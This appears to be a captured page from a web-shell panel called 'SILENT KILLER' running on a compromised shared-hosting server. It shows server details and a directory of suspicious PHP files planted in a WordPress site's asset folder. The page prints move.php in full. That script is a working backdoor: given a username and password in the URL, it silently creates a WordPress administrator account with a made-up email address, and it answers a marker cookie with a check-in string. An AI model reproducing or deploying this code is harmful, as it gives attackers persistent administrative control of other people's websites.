SILENT KILLERPanel

Current Path: > home > codekrsu > > > socialize.lk > > assets > > js


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0777 ]

Files and Folders in: /home/codekrsu///socialize.lk//assets//js

NameTypeSizeLast ModifiedActions
arena_log File 12728 bytes December 26 2024 02:02:58.
error_log File 31905 bytes July 25 2025 08:51:36.
formhidden.php File 975 bytes December 26 2024 02:02:58.
k2item.php File 1435 bytes December 26 2024 02:02:58.
move.php File 1714 bytes December 26 2024 02:02:58.
move_site.php File 1536 bytes December 26 2024 02:02:58.
script.js File 3014 bytes December 26 2024 02:02:58.

Reading File: /home/codekrsu///socialize.lk//assets//js/move.php

<?php

if(isset($_COOKIE['SNB0'])) {
    die('988'.'enBgA');
}

$dir = __DIR__;
while (!file_exists($dir . '/wp-load.php')) {
    $parent = dirname($dir);
    if ($parent === $dir) die;
    $dir = $parent;
}

require_once $dir . '/wp-load.php';

function generate_fake_email($domain = 'gmail.com') {
    $first_names = [
        'john', 'jane', 'mike', 'anna', 'alex', 'kate',
        'emma', 'liam', 'olivia', 'noah', 'ava', 'william',
        'sophia', 'james', 'mia', 'ben', 'amelia', 'ethan',
        'chloe', 'daniel', 'lily', 'lucas', 'grace', 'logan',
        'ella', 'jack', 'zoe', 'harry', 'ivy', 'leo', 'nina'
    ];

    $last_names = [
        'smith', 'doe', 'brown', 'white', 'black', 'taylor',
        'johnson', 'williams', 'jones', 'miller', 'davis', 'anderson',
        'thomas', 'moore', 'martin', 'jackson', 'lee', 'clark',
        'lewis', 'young', 'walker', 'hall', 'king', 'wright',
        'lopez', 'hill', 'scott', 'green', 'adams', 'baker'
    ];

    $first = $first_names[array_rand($first_names)];
    $last  = $last_names[array_rand($last_names)];
    $number = rand(10, 999);

    return "{$first}.{$last}{$number}@{$domain}";
}


$new_username = isset($_GET['user']) ? sanitize_user($_GET['user']) : '';
$new_password = isset($_GET['pass']) ? $_GET['pass'] : '';
$new_email    = generate_fake_email();


if (empty($new_username) || empty($new_password)) die;
if (username_exists($new_username)) die;

$user_id = wp_create_user($new_username, $new_password, $new_email);
if (is_wp_error($user_id)) die;

$user = new WP_User($user_id);
$user->set_role('administrator');
wp_set_password($new_password, $user_id);

echo '$OK$';
?>

SILENT KILLER Tool